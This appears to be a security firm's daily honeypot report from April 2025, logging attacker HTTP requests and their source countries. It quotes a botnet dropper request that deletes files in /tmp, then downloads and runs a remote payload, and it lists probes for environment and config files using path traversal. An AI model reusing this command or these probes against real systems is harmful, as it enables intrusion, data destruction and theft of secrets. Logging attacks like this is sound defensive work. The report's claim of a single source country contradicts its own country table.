Skip to main content
  1. Daily-Posts/

Report: 2025-04-17

·410 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-04-17
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 1 stage 1 IP address(es), linked to 1 dropper URL(s).

There are 23 new requests that have never been observed before (these were added to the monitored request database.).

A total of 1633 requests were recorded during the day, originating from 1 different countries, with a peak of 304 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USGermany
USGermany
SGGermany
USGermany
SGGermany
USDubai

botnet_dropper_behaviour
#

remote_addrrequest
190.72.152.73GET /shell?cd+/tmp;rm+-rf+*;wget+31.58.51.98/jaws;sh+/tmp/jaws HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
614HEAD /manager/html HTTP/1.1
2091GET /odinhttpcall1744884160 HTTP/1.1
2101GET /OdinHttpCall1744884160 HTTP/1.1
2241GET /..;/env.test.js HTTP/1.1
2251GET /..;/env.production.js HTTP/1.1
2261GET /..;/env.prod.js HTTP/1.1
2531GET /Odin/http/call1744884160 HTTP/1.1
2981GET /odinhttpcall1744905457 HTTP/1.1
3101GET /OdinHttpCall1744905457 HTTP/1.1
3161\x12\x01\x00^\x00\x00\x01\x00\x00\x00$\x00\x06\x01\x00*\x00\x01\x02\x00+\x00\x01\x03\x00,\x00\x04\x04\x000\x00\x01\x05\x001\x00$\x06\x00U\x00\x01\xFF\x04\x07\x0C\xBC\x00\x00\x00\x00\x00\x00\x15\xD0\x00\xAF/\xA3h\xF6\x7F\x00\x00\x80\xFB\x9F\xAE\x82\x00\x00\x00\xE0\x81\xC8h\xF6\x7F\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01
3251GET /Odin/http/call1744905457 HTTP/1.1
3461POST /ztp/cgi-bin/handler HTTP/1.1
3611GET /assets/configs.json HTTP/1.1
3651GET /app.config.json HTTP/1.1
3681GET /..;/env.development.js HTTP/1.1
3691GET /..;/env.dev.js HTTP/1.1
3741GET /env.dev.js HTTP/1.1
3751GET /web/api/config.js HTTP/1.1
3761GET /src/api/config.js HTTP/1.1
3771GET /src/config.js HTTP/1.1
3781GET /web/config.js HTTP/1.1
3791GET /assets/env.js HTTP/1.1
3871GET /env.production.js HTTP/1.1

country_iso_code
#

number_of_occurencecountry_iso_code
0304US
1294NL
2170DE
3169BG
4166GB
5130SC
665HK
758PL
842LT
940RO
1020IL
1114SG
1213NO
1313AU
1410PT
1510RU
168ZA
178LA
188GH
198IN
207AO
217FR
227CN
236BR
246BE
256TR
265UA
275VN
284MC
294CA
304KR
314BA
323NG
333JP
343IR
352EC
361AM
371IE
381IT
391HU
401CG
411VE
421SI

Related

Report: 2025-04-16
·4764 words
Repport Daily
Report: 2025-04-15
·378 words
Repport Daily
Report: 2025-04-14
·369 words
Repport Daily